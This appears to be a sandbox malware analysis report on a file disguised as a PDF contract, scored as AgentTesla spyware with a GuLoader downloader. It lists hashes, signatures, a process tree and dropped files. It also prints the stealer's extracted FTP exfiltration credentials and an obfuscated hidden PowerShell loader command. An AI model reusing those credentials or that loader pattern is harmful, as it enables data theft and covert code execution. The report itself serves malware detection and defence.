Overview

overview

10

Static

static

1

CONTRACT P...df.exe

windows7-x64

10

CONTRACT P...df.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    141s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-20231130-en
  • resource tags

    arch:x64arch:x86image:win7-20231130-enlocale:en-usos:windows7-x64system
  • submitted
    07-12-2023 07:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CONTRACT PREVIEW-pdf.exe

  • Size

    677KB

  • MD5

    e8d7ef2ffa5024bcb5efdf102f4c2c4f

  • SHA1

    cdb42682a5290a61924eff92a99afebf449b4f6d

  • SHA256

    4b653e8332214d845b60536ad7f0ec8f669126e66ca7a183a95eaa8d9e6baf87

  • SHA512

    df66c72ec66f7a8bbddd9241828ff480cac403ddb5a856e33c712236008cae50a95259297e732a12b6e504b65f303915b6716c3983d10082ac0c153f0b3562aa

  • SSDEEP

    12288:ywFGHE39Wr76v13mik8ilzhFyylgimtdYM3O0V7bbF:y5HE3orGv1C8ilzhFplgZtub0V7t

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.vvspijkenisse.nl
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    playingboyz231

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\CONTRACT PREVIEW-pdf.exe
    "C:\Users\Admin\AppData\Local\Temp\CONTRACT PREVIEW-pdf.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2780
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Conjugacy=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Boloroot\Hemotrophic\Ribers\Stafetten\Inspiration.Gno';$rhizotic=$Conjugacy.SubString(48958,3);.$rhizotic($Conjugacy)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1164
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1384

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Rkkens.ini
    Filesize

    32B

    MD5

    a8ca1db6ae34f5e5c152094f44f92476

    SHA1

    9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

    SHA256

    1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

    SHA512

    e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

    Download Submit

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Boloroot\Hemotrophic\Ribers\Stafetten\Inspiration.Gno
    Filesize

    47KB

    MD5

    6c5ecd681013df0a80b7a6b555f966a3

    SHA1

    da3e4c299b3ee1290d7756580edae500f9314f21

    SHA256

    7a2ed4b1f7c6a060bd324fea3e1a9d102b3c7b602b24ea3ccaffc476dd0cadf3

    SHA512

    6a9dc58a174e697d67834b6ad70d81232acc5c3cac8b1c1e2b44784a915750830e5f65e081d538efdc0e904c7059265539f18d7bbfde76eec29233ec0f908358

    Download Submit

  • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Nikkelholdig.Pup
    Filesize

    263KB

    MD5

    438265661adf9121d5d0cec203c1bffe

    SHA1

    e7063ecd2816f3b95c0134dbbc7753fb95043152

    SHA256

    84b6fec3270c7a3c15e6255a26b160697a5a0809a2da4c0c5537b221c4bb8a8a

    SHA512

    04fc48dd1277ac8f61e0764540f1e6fe1bd950ea9c72bf8a924683d363ed4c584afdc321bc4e2a47547f0bbf91be00479dff3104e686dcb4589d793d332e2d6c

    Download Submit

  • memory/1164-150-0x0000000073700000-0x0000000073CAB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1164-164-0x00000000065E0000-0x0000000009513000-memory.dmp

    Filesize

    47.2MB

    Download

  • memory/1164-151-0x0000000002A80000-0x0000000002AC0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1164-148-0x0000000073700000-0x0000000073CAB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1164-155-0x00000000054B0000-0x00000000054B4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1164-156-0x00000000065E0000-0x0000000009513000-memory.dmp

    Filesize

    47.2MB

    Download

  • memory/1164-157-0x00000000065E0000-0x0000000009513000-memory.dmp

    Filesize

    47.2MB

    Download

  • memory/1164-158-0x0000000076E80000-0x0000000077029000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/1164-159-0x0000000077070000-0x0000000077146000-memory.dmp

    Filesize

    856KB

    Download

  • memory/1164-149-0x0000000002A80000-0x0000000002AC0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1164-161-0x0000000073700000-0x0000000073CAB000-memory.dmp

    Filesize

    5.7MB

    Download

  • memory/1164-162-0x0000000002A80000-0x0000000002AC0000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1164-169-0x00000000065E0000-0x0000000009513000-memory.dmp

    Filesize

    47.2MB

    Download

  • memory/1384-160-0x0000000000F70000-0x0000000003EA3000-memory.dmp

    Filesize

    47.2MB

    Download

  • memory/1384-165-0x000000006F200000-0x0000000070262000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/1384-166-0x0000000000F70000-0x0000000003EA3000-memory.dmp

    Filesize

    47.2MB

    Download

  • memory/1384-167-0x000000006F200000-0x000000006F240000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1384-163-0x0000000076E80000-0x0000000077029000-memory.dmp

    Filesize

    1.7MB

    Download

  • memory/1384-168-0x000000006EB10000-0x000000006F1FE000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/1384-170-0x000000001F740000-0x000000001F780000-memory.dmp

    Filesize

    256KB

    Download

  • memory/1384-172-0x0000000000F70000-0x0000000003EA3000-memory.dmp

    Filesize

    47.2MB

    Download

  • memory/1384-175-0x000000006EB10000-0x000000006F1FE000-memory.dmp

    Filesize

    6.9MB

    Download